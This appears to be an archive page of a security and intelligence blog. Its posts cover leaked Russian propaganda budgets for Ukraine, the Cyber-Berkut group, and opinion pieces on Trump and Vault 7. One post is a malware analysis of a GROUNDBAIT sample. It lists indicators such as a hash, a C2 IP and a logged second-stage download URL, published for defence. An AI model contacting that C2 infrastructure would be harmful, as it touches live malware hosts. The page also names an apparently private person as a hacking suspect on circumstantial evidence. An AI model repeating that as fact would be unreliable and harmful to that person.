Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Archive for March 2017

RULEAKS: Russian Media and Disinformation in Ukraine by the DNR-ONLINE

with 2 comments

INTRODUCTION:

Back in December I located a dump of data on the darknet placed there by a hacker collective in Ukraine called RUH8. The dump is rather good sized and all come from Russian backed Ukraine sources. RUH8’s dumped one group in particular that I was interested in because I located a piece of malware in the email spool that, once run through the usual tests, showed to be something not widely seen before. I will cover the malware further down the article and will include IOC’s but once I harvested the email spool itself and began to get things translated things got even more interesting.

Once I mirrored the site I got some help from <REDACTED> and set to work in translation of emails and documents attachments. Most of the bulk of the dump is average emails concerning daily business but a few began to tell a tale of the company that the emails came from and how it was in fact a Russian front organization created for propaganda in Ukraine and used to manipulate the populace in the Donetsk People’s Republic (The Russian separatist area of Ukraine) and those outside it including other countries outside of Ukraine.

Having all of this come to light just after the election win for Trump, and now coming out here in the midst of the Russian intervention and collusion investigations today, I thought this report would be prescient and give a rare insight into how the Russian propaganda machine works, how the intelligence apparatus of Russia works in this respect, and perhaps bring to light a new piece of malware for everyone to see.

THE LEAK:

The leak by RUH8 in the darknet consists od more than a few entities email spools as well as individuals that they have described as assets of Russia. In the case of this post the data comes from the domain dir-online.ru. This is a media org in Ukraine that is Russian backed and as I said before caters to the Donetsk People’s Republic. Within the dump there are many documents covering the day to day but five documents stood out amongst them all (frankly there are more to be analyzed and one needs Russian speakers to translate them all) as being all things shady.

RUH8 is also the group that hacked and dumped “The Grey Cardinal’s” email spool as well. Having gone through that spool I did not find any malware of merit or anything that was new so I moved on in mirroring and checking for goodies. They keep adding content to the site too so I would expect eventually I will locate some more goodies in the future. Keep an eye on the blog for more when I find it. The Grey Cardinal though is an interesting figure and I recommend you all read up on him as well.

THE PROPAGANDA PLAN:

Right, well on to the good stuff! The following documents found in this dump show Russia’s machinations at propaganda in Ukraine, well, at least this small slice of it.

DOC1

From Translator: This talks about “anti-Russian hysteria” in the media and about disinformation and fake news that makes Russia look bad. And also that pro-Russian voices are accused of being agents of the Kremlin. To counter this, this document outlines a project to create a pro-Kremlin media campaign in the Ukraine that includes a budget for hiring journalists and buying equipment like computers and voice recorders, a budget for freelancers and “insiders”, Website hosting, web administrators, editors, advertising, The amounts — which are, for some reason, in US Dollars, are $9,250 for initial set-up expenses, and $38,280 ongoing costs. Those could be monthly costs — the salary of a full-time journalist is listed at $2,000, and that’s likely to be $2,000 a month.  The editor in chief, who’ll be based in Kiev, will get $2,500 a month. Hey, their freelance budget is $6,000 a month! 

DOC2

From Translator: is a little disturbing, since it outlines how the anti-war movement in the Ukraine can be used for pro-Russian purposes. For example, the idea is to create a picture of the leaders in Kremlin as corrupt power-grabbers who are using the war in eastern Ukraine to distract everyone from their own problems. Russia’s invasion of eastern Ukraine is just misformation from Kiev. Sounds totally legit.

Oh, and I figure out why it’s all in US Dollars. Hah, this is funny. Way back when I was based in Russia — something like 20 years ago, when the Soviet Union had just collapsed, inflation was rampant. Stores had to change the prices on all their products several times a day! To deal with it, they all switched to using Dollars or Euros instead, the traitors! To fix the problem, instead of fixing the economy, the Russian government outlawed the use of foreign currencies on prices. So what the stores did was switch to using something called the “arbitrary unit” — which just happened to be worth as much as the dollar, by pure coincidence. Ever since then, this “arbitrary unit” has been the default price. It particularly convenient during inflationary periods, or when dealing with local currencies in different republics. Plus, everyone knows what it means. So, in this document, they use the term “arbitrary unit” and in others, they seem to have just used the dollar symbol instead.

Also, I can confirm that the ongoing expenses are per month — they spelled that out in this budget.

So anyway, this is another juicy document. They’ve put together a budget for running a fake anti-war grassroots organization.

Initial costs are $79,200 for things like computer equipment, recruiting, registering domain names and getting business and media licenses, and website design. It’s interesting that in both this budget and the previous one I looked at, they’re careful to get all the permits and licenses in place. They might be trying to undermine the government of a foreign country, but at least they’ve got all their paperwork in order!
Then the ongoing expenses are $86,000 and include salaries for regular contributors and freelancers, salaries for editorial managers and copyeditors, a financial manager and their deputy, $2,000 for a lawyer, $20,000 for online advertising, and $10,000 for promotion on social media like Facebook and VKontakte (Russia’s LinkedIn).  

They’re expecting 100,000 unique visitors a day on weekdays.

It’s interesting they note that they’ll be playing games with the tax status of their employees — like in the U.S., there’s a difference between paying people as staff (where the employer has to pay a chunk of the taxes) and as freelancers (where the poor schmuck has to pay for everything). Also, in Ukraine, folks living in the disputed territories don’t have to pay taxes. They’re saying that they can save 40% as a result of playing around with this, which they claim is common practice in the Ukraine.

So not only are they undermining a foreign government, but trying to avoid paying taxes while they do it! I don’t know which is worse.

Document docxk7EDEjG06i is a plan for creating a major national media outlet from scratch. It will take $347,640 in startup costs, and about $146,500 a month in ongoing expensies. Total costs, for an eight-month period, are $3.82 million, including advertising costs, and other related expenses. Again, they’re playing around with the taxes. And they’re expecting to get a quarter million visitors a day on weekdays.

This one also has a budget for protection against DDOS attacks. They estimate that this will cost $2,000 a month (including the site hosting itself).

They also plan to sell advertising here, and have an ad sales department, and the editor in chief’s salary will be $10,000 a month plus a share of the ad revenues.

That’s not too shabby… Then they’ve got some projections for costs and revenues after that first eight-month period, which is interesting for those of our readers who plan to launch an online magazine in the Ukraine…

DOC3

From Translator: This is super evil. I’m really impressed! The idea is is to create a pro-European, anti-Russian website — with the underlying message that the Ukraine will be better off without those annoying eastern provinces, and let Russia have them, so that it can enjoy its wonderful European future without them dragging the country down. So, again, they have an editorial budget. $69,900 in setup expenses, $65,000 a month in ongoing expenses, and plans to reach 100,000 readers a day on weekdays.

DOC4

From Translator: This is a plan to create a news site to cover the conflict in the disputed territories, because people are hungry for war news. The idea is to make it seem objective and independent, but slip in a pro-Russian point of view. So they’ll use terms associated with anti-Russian reporting, but slant the coverage to make Ukraine look bad. Yicch. Startup expenses: $97,200, ongoing expenses: $126,500 per month, expected audience: 120,000 unique visitors a day during weekdays.

DOC5

From Translator: This is an analysis of the Ukrainian political system and how a lot of work is done by “shadow” organizations in government. There don’t seem to be any action items here.

DOC6

From translator: This is an overview of the Ukrainian media climate, and on how anti-Russian it is, and blames Western advisers for some of it.

So here is the context from these documents from the translator for you…

From Translator: These emails seem to have been sent to Georgi Bryusov, who heads up Russia’s wresting federation, and are in reference to a meeting with “PB.” I don’t know who “PB” is.

Bryusov then forwarded them on to Surkov.

So, how likely is this?

Well, I spent a some time covering a similar conflict in Georgia, where there was also a “separatist” province, called Abkhazia, and the conflict there was used to put pressure on the Georgian government. Although it was supposed to be a purely local, homegrown movement, Abkhazia — which didn’t even have an airport — somehow had fighter jets and bombed Georgian-controlled areas with them. (I was in one of those areas with a group of UN observers while it was being bombed. Fun! The Georgians shot down one of the planes which … surprise, surprise! … turned out to have a Russian pilot inside.)

Russia also paid the operating costs for the Abhazian press center, where I spent many a happy day. All international phones calls were free! I could call my editors anywhere in the world, and file stories about the brave Abkhazian rebels! They also fed us and provided us a place to sleep, and organized regular trips to the front lines where we could enjoy being shot at by the Georgians. They also showed us how well prisoners of war were treated and corpses of people killed by the Georgias and, allegedly, mutilated. (Though the Red Cross folks I talked to couldn’t confirm that the mutilations were real and not, say, the expected results of getting too close to an explosion.)

Anyway, the bottom line is that I do have personal experience of Russian spending gold to manipulate the media, in case anyone ever had any doubts that they were willing to do it.

As you can see from the commentary above, and you too can read the documents as well, the Russians set up a media company including websites and formulated plans to manipulate people toward the Donetsk People’s Republic and against a Free Ukraine. I am still going through the dump looking for the bills for the domains mentioned as well and will run them through Threatcrowd and other sources to see if they were used at all for malware C2 and propagation. Which brings me to the use of dnr-online as a C2. Interestingly enough the site itself is not a C2 but it does have connectivity to other IP addresses and domains that are.

dnr-online.ru

WHOIS for dnr-online.ru

5.101.152.66

The archology of malware that talks to 5.101.152.66 is rather interesting. There’s a bit of everything bad attached to that one to be sure including that MrSweet address that is ransomeware central. 5.101.152.66 is owned/created by beget.ru which has quite the many few dirty connections as well.

beget.ru WHOIS

beget.ru

Of course beget could be innocent enough but as you can see there is enough of Mos Eisley in there to make one not want to get an account there and set up a site right? I will continue to look into other domains within the networks that dnr-online bought as soon as I can locate the bills for them or domain names and that will be another post I am sure. What all of this tells you though, is that the Russians have always been carrying out these kinds of active measures against people like those in Ukraine as well as what they did to us in the election of 2016. This is not a one time deal and certainly will not be the last one we shall see. In fact, the bots and the domains will continue to be set up by the likes of the SVR and GRU in hopes of manipulating the general populace toward the goals of the Putin regime until it’s demise.

… and likely past it.

THE MALWARE & GROUNDBAIT:

Right! now on to the other interesting bit found in the dump from dnr-online. In looking at the spool I dumped all attachments into a folder and began checking them for malware. All the word docs, excel sheet, power-points etc. The docs all checked out but one zip file had a .scr file in it that turned out to be malware. The file (Центр управления восстановлением ДНР справка-доклад за 13 октября 2015 года.exe) Center for Recovery Management of the DNR certificate-report for October 13, 2015.exe came from an email comiing in from a Russian source to the head of dnr-online. I am unable to source the headers at this time of the email but the question becomes was this malware sent to the DNR by RUH8 or was this malware sent to DNR to send to others in some other campaign. I cannot say either way but, the malware is a new sample of GROUNDBAIT or Prikormka that was detected and reported on by ESET running rampant in Ukraine. Given that ESET claims that this malware was being used against the separatists in Ukraine it stands to reason that the logic here is that the malware was to be used by the propaganda campaign against those it was seeking to manipulate. However, the nagging thing for me is the way this was passed around. The email has no real context in the text and to me it seems to imply that it is a fix for things inside dnr. My other thought is that maybe someone got hold of the GROUNDBAIT raw sample and re-used it by re-packing it and setting it against dnr-online.

An interesting notion…

I contacted ESET and talked a bit with the guy who did the work and he was.. Well.. Not so helpful. So here are the IOC’s for this file for you all to look for.

IOC’s

Filename: Recovery Control Center Help DNR-Report for October 13, 2015
Filetype:.exe
SHA256: f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62 (AV positives: 52/57 scanned on 04/30/2016 07:33:42)
File raw: zip file: zipnh4dZDtMUk.zip

https://www.hybrid-analysis.com/sample/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e?environmentId=100
https://virustotal.com/en/file/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e/analysis/1484661011/

https://virustotal.com/en/file/4eaf154ce8974228db6e35a1364337a12b821b73f052a44dc24ebdf0c1da6a4e/analysis/1484661011/

Dropped executables
“archive.rar” has type “gzip compressed data from NTFS filesystem (NT)”
“helpldr.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“samlib.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“rbcon.ini” has type “ASCII text with CRLF line terminators”

Writes directory archive.rar (exfil)

C2 connected:185.68.16.35
Connects and downloads second stage: GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0 HTTP/1.1

https://www.threatcrowd.org/ip.php?ip=185.68.16.35
https://www.threatcrowd.org/malware.php?md5=7accb6fed266a2023659f438ad1b3546
domain:      wallejob.in.ua
descr:       Domain registered for customer of Ukraine.com.ua
admin-c:     UKRAINE-UANIC
tech-c:      UKRAINE-UANIC
status:      OK-UNTIL 20170619000000
nserver:     ns114.inhostedns.com
nserver:     ns214.inhostedns.net
nserver:     ns314.inhostedns.org
mnt-by:      UKRAINE-MNT-INUA
mnt-lower:   UKRAINE-MNT-INUA
changed:     hostmaster@ukraine.com.ua 20160907200219
source:      INUA

Found malicious artifacts related to “185.68.16.35” (ASN: , Owner: ): …
URL: http://wood-house.com.ua/ (AV positives: 2/68 scanned on 12/27/2016 16:55:43)
https://www.threatcrowd.org/domain.php?domain=wood-house.com.ua

URL: http://wallejob.in.ua/ (AV positives: 5/68 scanned on 11/17/2016 02:10:28) <—GROUNDBAIT C2
https://www.threatcrowd.org/domain.php?domain=wallejob.in.ua
https://www.hybrid-analysis.com/sample/319e9dc36678c4d774ba0765ec93d3160bd476ab0f98bac1b7e5b92e7994a88a/?environmentId=1

URL: http://zarabatak.ru/ (AV positives: 1/68 scanned on 07/20/2016 10:59:29)
https://www.threatcrowd.org/domain.php?domain=zarabatak.ru

URL: http://psh.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:35:37)
https://www.threatcrowd.org/domain.php?domain=psh.co.ua

URL: http://sem-dev.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:33:23)
https://www.threatcrowd.org/domain.php?domain=sem-dev.co.ua

wood-house.com.ua
domain:           wood-house.com.ua
dom-public:       NO
registrant:       xdkjv649
mnt-by:           ua.intermedia
nserver:          ns311.inhostedns.org
nserver:          ns211.inhostedns.net
nserver:          ns111.inhostedns.com
status:           ok
created:          2014-11-07 13:31:27+02
modified:         2016-11-03 16:37:39+02
expires:          2017-11-07 13:31:27+02
source:           UAEPP

registrar:        ua.intermedia
organization:     SE Rabotnov Volodymyr
organization-loc: ФОП Работнов Володимир Володимирович
url:              http://names.com.ua
city:             Melitopol
country:          UA
source:           UAEPP

contact-id:       xdkjv649
person:           Vladimir V Rabotnov
person-loc:       Работнов Владимир Владимирович
e-mail:           not published
address:          not published
address-loc:      not published
phone:            not published
mnt-by:           ua.intermedia
status:           ok
status:           linked
created:          2013-04-05 15:01:02+03
modified:         2014-01-08 23:42:17+02
source:           UAEPP

 

TYING IT ALL TOGETHER:

So what we have here is the insider’s view of how dnr-online, a propaganda wing within Ukraine’s Donetsk People’s Republic put together a media service(s) and planned to use them as a framework of Russian propaganda in the region. We also have malware that is known to be actual spycraft in the region within it’s mail spool being passed around at least to two sources inside, one of them being the director of the DNR company. Was that malware meant to infect and eventually allow for the dump in the darknet or was the malware being passed along for other uses that we cannot see in this spool dump? In either case this information makes it clear that in Ukraine the Russian propaganda and espionage machines are alive and well and using the net as a force multiplier at the very least.

I will continue looking at the growing dumps by RUH8 and let you all know about any malware and goodies that pop up. It is also of interest to you all that this dump has been around and certain groups have looked at it and just sort of said “Nothing to see here” which is interesting to me. I mean malware that no one has seen really and plans for propaganda in the region are of no interest? I guess maybe these groups just did not want to spent the cycles on looking deeper into the data. I actually did with the help of others as well as checked the forensics on the metadata to insure the stuff was real.

…but that’s just me… I am not a churnalist.

Oh well..

More when I have it.

K.

UPDATE!: One day after this report one IP address involved as a nexus of malware has changed it’s domain name! Coincidence? Hmmmm?

Screenshot from 2017-03-29 06-14-33

Written by Krypt3ia

2017/03/28 at 13:00

Cyber-Berkut Joining The Manafort Fray

with one comment

Cyber-Berkut, a Russian leaning alleged hacker collective in Ukraine decided to weigh in on the whole Manafort debacle with a data dump. The dump unsurprisingly is pro Russian and attempts to paint the US as trying to manipulate things and make it look like Manafort is guilty. Berkut does this by dropping a word doc and a couple of pdf’s that they claim make a case for the State Department trying to discredit Manafort’s efforts in Ukraine on Russia’s behalf. It is rather amusing and ineffectual really but I had to take a closer look because they claimed to have hacked these documents. The documents look legit but there is no source on these as to where they were hacked from if hacked at all as well as no other dump to confirm a hack at all of any merit.

They try to link Leshenko to all of this. Leshenko too was alleged to have been the hacker in the Manafort cell phone hack and extortion. Same actor?

Now berkut doing this is not new really but most of the time they spend their time attacking the Ukrainian factions who reside outside of Donetsk who want to have a free country, not those who want Russian rule. In the past this group has hacked and DDoS’d sites but this one, weak as it is, caught my attention just because Manafort is now in the hot seat over Russian ties to oligarchs who are close to Putin while running the Trump campaign so one tends to want to dig. In looking at Berkut and their history other have claimed that they are part of the Fancy Bear group and even attempts have been made to link them to the cutout Gucci-fer (Gucci, like Gianni and Fur, like… Fur.. Not GOOSIFUR) and DNCLeaks as well. These are somewhat tenuous reports though from what I saw in looking out there at them but it made me want to dig a little more into them.

Berkut showed up in or around July 2014 with sites being created on numerous domains since. Most of theses sites had been registered privately negating personal information but several of them from the time of first creation have one name attached to them; Aleksandr Pachenko. An Aleksandr Panchenko does live in Ukraine and does in fact work in tech who may fit the bill as to the originator of the sites. The email address though used for each of these, alex_panchenko@mail.com, does not really exist and the addresses used are bogus as well so there is not much to go on other than a name but let’s get back to those pesky and numerous domains eh?

CYBER-BERKUT.SU
CYBER-BERKUT.TK
CYBER-BERKUT.RU
CYBER-BERKUT.COM
CYBER-BERKUT.INFO
CYBER-BERKUT.BIZ
CYBER-BERKUT.CENTER
CYBER-BERKUT.ORG
CYBER-BERKUT.US
CYBER-BERKUT.ME
CYBER-BERKUT.CZ
CYBER-BERKUT.IM

It seems that whoever created these sites (including a defuct darknet site) really wanted to get information penetration maxed out. Many of the sites still work and others have been decommissioned and the domains are up for sale. in each case though of creation they all have been created anonymously with domain registrations all over the world except for the six or seven I located with early creation dates going back to 2014. Is this because this Aleksandr created them without figuring what he was doing with them? Or were these created with that name as a means to an end to mislead people? If in fact Berkut is just a anonymous hacker group wanna be aligned with the Russian state then maybe this guy just figured that historical whois costs money and long enough goes by and no one pays attention? If it is the other case where someone is using his name, why be so consistent with it? Does someone hold a grudge or is this a famous person that they are just using the name of? I started looking around to see and here’s what I came up with.

Aleksandr Panchenko 1: Mathematician currently studying in Germany on Phd

Aleksandr Panchenko 2: Chessmaster (deceased)

Aleksandr Panchenko 3: 32 year old  living in Kyiv Ukraine who’s profession is in computers (Oracle Dev, Unix Admin etc)

Aleksandr Panchenko 4: Wedding Photographer in Kyiv Ukraine

There were others but you get the sense that the name Aleksandr Panchenko in the Baltics is kinda like John Lee in China if you catch my drift. Though, that one guy, the one with all the technical experience does kinda stand out right? That is someone who has the technical chops to do some hacking and dumping as well as run sites right? It is all way circumstantial but I for one, if I were the FBI say, might go look this guy up and ask em a few questions. After all, the Berkut has been naughty and attacked us as well as others in the wider internet world.

The Manafort intersection though still interests me. I wonder if they will continue on trying to muddy the waters now that Manny has decided he will testify in front of Congress. As the shoes of the millipede keep dropping I am sure that the RU factions will try to drop chaff on things to confuse everyone. I will keep an eye on the site(s) to see if they dump anything else of interest but for now just take a gander at these files and the results of the searches…

Doc 1

Doc 2

Doc 3

K.

Written by Krypt3ia

2017/03/24 at 18:24

Posted in Disinformation

Fabricator

leave a comment »

I have been ruminating lately on our situation regarding aspects of Russian interference (active measures) and the new President of the United States. In previous posts I have delved into the Wilderness of Mirrors of counterintelligence that we find ourselves in today as well as some other musings on motives that the Russians and the President (and his minions) may have in relation to their actions. Today though, on the morning of the big Comey interview in congress, I would like to cover the fabricator. By fabricator I mean the intelligence term and not the guy who makes something on the line at the local plant. A fabricator in the parlance of spies means someone who lies, creates stories, and half truths in order to deceive in order to mislead intelligence operations. More to the point, I would like to submit that in the goings on today you will have to ponder whether or not the president and his minions are all fabricators acting in whatever interest they have against us all.

Fabricators have motives just like any other liar but here are the defined reasons in the intelligence definition:

  • Fanaticism or ideology is often cited as the key reason behind fabricator activity. When fanaticism is involved or ideology becomes stronger than morals, fabrication may then be seen as a reasonable means to an end. The fabricator may invent the fake intelligence to help bring about a specific outcome to a situation.[7][9]
  • Mental illness, such as confabulation, often combined with alcoholism, causes some individuals to fabricate intelligence, most often done as part of a fantasy of being a secret agent or to gain official attention.[10][11]
  • Money is a strong incentive for some fabricators. Often, a reliable intelligence source agent will become a fabricator because of financial problems or greed. When the agent no longer has valid intelligence to sell to the conducting intelligence officer, the agent may decide to sell fabricated intelligence in order to satisfy need or greed. (Source: Wikipedia)

As you can see these are not so different from any other liar, however in the context of the intelligence world and what we see playing out today all of them could also easily fit the Presidents and the White Houses machinations of late. many have speculated already on all of these with regard to Trump and his coterie of minions in the White House today. I would put it to you here that all of these are likely but money and fanaticism are two of the key players here with a healthy helping of political expeditiousness. While Trump seems to be in his own reality much of the time, his outright lying and cognitive dissonance has multiple purposes. I would say that he has all of these factors, the mental illness, (narcissism) Desire for money and power, (Money) and a fanaticism that he wears like a cloak to keep him in the seat of power by using a base that he may not in fact believe in truly, but needs their support to win. I would say that this was a thumbnail of his campaign and what we are seeing now as he is running the country.

Looking back I would say the one biggest tell has been his claims of the Obama admin “tapping his wires” at Trump Tower during the election. Trump used this, as he does many other outrageous claims by Tweet, to distract everyone. He is specifically distracting the media, from looking at the real problem at hand (e.g. Russian ties between himself and his coterie and the monies involved) in what I am calling a WMD attack (Weapon of Mass Distraction) vis a vis early am Tweet storms. As we have seen with the claim of wiretapping there is no evidence but he uses spin and word salad to confabulate and bamboozle the media and the populace to look the other direction. I put it to you now that you can expect some other outbursts today or tomorrow post the Comey hearing in an attempt to spin things away from the connections that he and his people have with Russia.

Trump is a fabricator.

See through it.

K.

Written by Krypt3ia

2017/03/20 at 12:26

Posted in HUMINT

Vault 7

leave a comment »

See Robert Redford at the top of the page? He’s playing a character who was an intelligence analyst who read books for the CIA. He came back from getting lunch for his co-workers and found them all dead, killed by a rogue CIA operation that hired an outside freelance assassin to kill them all and cover up rogue operations. This is fiction, and YOU are not him. So please everyone just calm the fuck down about the Wikileaks Vault7 dump ok?

RIGHT! Well Wikileaks has done it again and released a dump of CIA exploits this time around. There are quite a few little gems in there and the hue and cry by the genpop has been idiotic as usual. My personal favorite was the epic fuckery around how the New York Times chose to say that some of the exploits “bypassed” the encryption of programs like Signal which sent many an INFOSEC twitter account into a tizzy over “OMG IT ISN’T A BYPASS!” which, by the way, FUCKING CUT THAT SHIT OUT YOU SELF IMPORTANT FUCKWITS! The point of the statement is true, if the software in the Vault7 dump is used on someone’s phone then the CIA is BYPASSING the encryption altogether. For that matter they are bypassing the application altogether! So stop with the self important I AM A GOD DAMNED IMPORTANT PENTESTER AND THE SEMANTICS OF THE HERE ARTICLE ARE WRONG ERMEGERD!

Just stop.

The point of it all is that these tools, if used against you (until they are mitigated by patching and fixes to OS’) will make any precautions you take on those devices moot ok? Arguing over the semantics of it all is just fucking stupid posturing and if you expect the average person to understand what you are saying, then you are delusional ok? Oh, and if you think that the average person is the target of these attacks, yep, you once again are delusional. Specifically, if you are a US person CONUS and you are just the average Joe the plummer, you are NOT the target of the CIA.

Sorry.. I know it hurts your self image but it’s fucking true.

Get over yourselves.

Ok, so that rant is over, now let’s move on to other things about this dump. There’s a lot of techical stuff that will make the wonks masturbate for quite a long time and that’s to be expected. However, I would like to talk about a few other side loaded things happening that you should think about. First off, let’s talk about the dump itself and who dumped it. It seems from what I am seeing Assange saying, is that the dump was given to Wikileaks by an insider who wanted to open up discussion over the pervasive nature of these kinds of exploits against common and deeply penetrated systems in our collective lives. By this I mean cell phones, TV’s and other IOT devices. Now most of the stuff in the dump looks to be from 2012 up to nearly 2016 so it is older in respect to 0day and hacking exploits in many ways. Since they were secret though and they took a lot of time to make sure there were bypasses as well as ways to hide their presence, the CIA’s stuff is still old from a certain standpoint. Within the community one has to offer up the idea that not everything stays secret and those services that cover assets that the CIA might want to bug also have people who spend their time looking for such software right? What I am saying is who knows what has been working well and undetected and what has been detected by a foreign power and counteracted or allowed to use as a means of disinformation. Take that into consideration when you read the dump. Sure the common man here in the world may not know about this stuff and it will blow their minds but in the IC maybe not ok?

Now let’s consider how long this data has been in the hands of Wikileaks and who may have had it before. This stuff may have been in the community at large for a long time. The CIA may have shared this tech with FIVE EYES in some cases but if you look at the headers much of it was NOFORN (No Foreign Persons) so let’s just assume it was inside Langley. If the data was common there, when did it get leaked originally? Who had it in the interim? This goes back to the paragraph above too. If the exploits were working, now we have to wonder if they were being fed bad data by them from an aware adversary (this will play a key fact in the дезинформация part of this post later) given when we think the data was stolen and leaked. The fact of the matter is this, brass tacks I don’t believe a word Assange says from his balcony at Hacienda Ecuador and my money is that this was not leaked by a CIA employee just because they had a change of heart. I personally believe that whoever leaked it is an asset of a foreign power and that power just might be Russia.

Which brings me to the issue of the quick disinformation spin up by what looks to be Russian trolls and bots on Twitter and elsewhere over this last dump. The narratives that are starting to spin up are aiming this data directly at Democrats (including Hillary) and are aimed to cause more friction within the country and our politics. Gee, who lately has been doing that I wonder? The Daily Beast had a good report on this and I agree with Rob that this has spun up way too quickly and too much cohesion to allow for it not to have been in the pipeline before the dump. My meaning is that as we have seen in the recent past with the hack on the DNC and active measures on our electoral system, the Russians have a useful idiot in Assange and the Wikileaks organization. Assange has been another lackey of Putin like Trump and in fact it is quite possible that the leaked data came from Russia by way of an asset inside the CIA. Which then makes the inevitability of a Russian mole hunt at Langley a very large possibility. I bet the polygraphers are all warming up their electrodes as I write this in Virginia.

So, while all you INFOSEC nerds wank off to the sploits just remember these salient points.

  • There’s a bigger more subtle game going on here
  • YOU are not that important so just take this stuff and work on how to fix it
  • Take a beat and remember YOU ARE NOT THAT IMPORTANT
  • The CIA is not charter to work within the USA these exploits were targeted at other countries. Just look at FINE DINING for case officers
  • Consider what exploits other countries have and are being used that you don’t know about
  • PENTESTERS ARE NOT FUCKING JAMES BOND. FOR FUCKS SAKE JAMES BOND IS NOT JAMES BOND!

Look at the bigger picture.

K.

Written by Krypt3ia

2017/03/08 at 13:48

Blowback

leave a comment »

Forty odd days into the new presidency and Putin is already telling his media minions to not talk about Trump anymore. The reason? Because Trump has become more unhinged and potentially uncontrolled by his possible handlers at the Kremlin is the going theory in the IC world. Personally I think that Putin is of two minds where this is concerned and this post will try to explain the possible blowback for him as well as the potential benefits of an unhinged president as well as maybe an impeachment. This gambit by Putin worked so well, too well, that perhaps the Kremlin and the ops guys (psyops/active measures/Gerasimov) could not have even gamed this out fully to have counter moves or plans on contingencies here.

The hacking of the DNC and all the active measures surrounding the 2016 election cycle from a strict operations standpoint was a thing of beauty to behold. Yes, it was carried out on us but as someone who appreciates a well planned out operation this one was pretty well done. The American populace was ripe for this and the political system was in a state where just a simple nudge with the right assets started the great Rube Goldberg device moving  and it culminated in Trump winning the election. I will not cover the problems with our voting systems here I have done so in another post(s) a while back but let’s just look at it from the higher levels of disinformation shall we? The ‘Fake News’ thing was a perfect storm for the under-educated Facebook minions out there and the very nature of social media was the teflon sprayed slug that deployed it all. From the churnalists and the disinfo operations out there the sway and the echo chambering that happened allowed for a critical mass of Trump support that would in the end eek out the electoral win. This is a real feat given that three million or so people voted for Clinton and the overall popular vote was easily hers. This was some math that I do not believe Putin and his intelligence community thought was a real possibility. I think they were as shocked by Trumps win as Trump was on the night of the election.

Trump did win however and at that time it was in Putin’s interest to cater to the man, play him with praise and friendship in order to curry that favor. The reciprocal praise and love by Trump throughout the candidacy and into the presidency has been odd as well and plays to the whole ‘kompromat’ story too. For this piece I am not going to stray too far into the kompromat theory at the Trump level (another day soon) but it has to be mentioned here that at the very least, there seemed to be a bromance between them for whatever reasons. Likely on both parts at the base of it, the idea that if they are friends they can do deals together which is what Trump had said on more than one occasion. This idea plays for me outside the kompromat thing because this is Trump after all (The Art of the Deal etc) but on Putin’s part it was a contingency plan. Putin’s goal was to cause as much fractiousness as possible in the elections and to unbalance the US as he perceived Clinton had in Russia and he succeeded.

Now that Clinton was out and Trump was in Putin likely thought that it would be smooth sailing, but, he should have had an psychological monograph or assessment on Trump before assuming so. It seems that they did not and have been compiling one as of February after the win and spiral since then. This is where the blowback starts as well as the possible wins for Putin. On the blowback side, an uncontrolled Trump could lead to actual crazy actions that would impede Putin’s goals. What if Trump decides to go all out and attempt to block his actions in Ukraine? What if Trump does an about face on NATO? What if Trump just goes off the deep end and starts wars with proxies of Russia that would complicate Putin’s plans of regional control and power? All of these things have to be taken into account post the administrations rocky, to say the least, fits and starts these forty days or so. Add to this all of the attention by the media and the populace, who are now asking for independent investigations into the ties between Trump and Russia pre election and you have heat. This heat is anathema to Putin’s goals here and thus it is blowback for him. He has been distancing himself from Trump and if sudden unexplained deaths of certain Russians is any indication, he has been cleaning up loose ends as well. But these things lead back to the kompromat, and I am saving that for later.

Anyway, let’s look at the upside to the Trump instability for Putin. Trump is a wild card and his consistent instability is causing push back here in the US that may lead to serious investigations on him, his minions, and all of their connections to Russian money as well as the whole Emoluments issue. There are law suits being formed and registered as well as the notion of an independent counsel for the Russia investigation has been gaining momentum. With all of this friction, the wheels of the US’ foreign policy has been slowed as well. Suffice to say that with all that is happening it would be easy to not be able to respond properly to actions taking place in the world nor there being a real outcry to respond to things because we have all been thrust into self introspection and a certain protectionism mentality. With this slack space to work, even with Trump being an unpredictable and uncontrolled asset of the Kremlin, Putin would have room to work on moving his agenda forward rather unhindered.

Once again, the ‘Wilderness of Mirrors‘ can lead one to inaction because you just cannot tell what is real anymore and who is telling the truth. With Trump and his outlandish tweets (say like accusing Obama of a “wire tapp”) on Trump tower it is hard to tell what he believes and what he is trying to maybe throw shade on to unbalance us all. Putin might seek to enhance this behavior as well as use it to his advantage as well. I would expect more disinformation (fake news) that may well end up in the president’s tweet stream and not just stuff about internal politics here in the US. The goal overall is to keep us unbalanced because an unbalanced nation is a nation trapped in amber and a nation weakened to inaction is exactly what Putin needs to succeed …Even with blowback.

K.

 

Written by Krypt3ia

2017/03/07 at 14:26

“Wilderness of Mirrors “

leave a comment »

screenshot-from-2017-03-06-07-40-31

With all of the crazed tweets over the weekend from 45 I thought it would be appropriate to acquaint my readers with the notion of the “Wilderness of Mirrors” as James Jesus Angleton put it. Angleton is famous for his paranoia and his actions during the time he was chief of counter intelligence at the CIA from 1954-1975. Today we are in an unprecedented time of national intrigue with our very nations political system at stake with the issues surrounding the hack of the DNC, the manipulation of the US election process, and now the allegations and insinuations that the Trump campaign may have colluded with Russia. All of these things now fall under the auspices of Counter Intelligence in that there are actors within our government that may be compromised and have either been witting or unwitting accomplices to a foreign powers manipulation of our national transition of power. What’s more, these same individuals may in fact be assets of that foreign power while they are in the power within the White House and elsewhere within the new administration.

Take a breath there and contemplate that statement.

We potentially have reached what I personally thought was only a movie plot line as a reality today. There are actual reasons to question whether or not the President of the US today may be a witting or unwitting asset of the Russian state. There may be reason to believe that the minions of the new President may also be assets of the Russian state, and to even make it worse we have seen a litany of lies and half truths given by these people and their dissembling has been caught by the Fourth Estate and held accountable for them. While there is no smoking gun yet, there is a lot to parse out with every mornings headlines in the Times and other papers of record but I would like to lift the curtain a little for you on the counterintel side for you. If you are gonna play this game at home  you need a primer on counter intelligence and the ‘Wilderness of Mirrors’

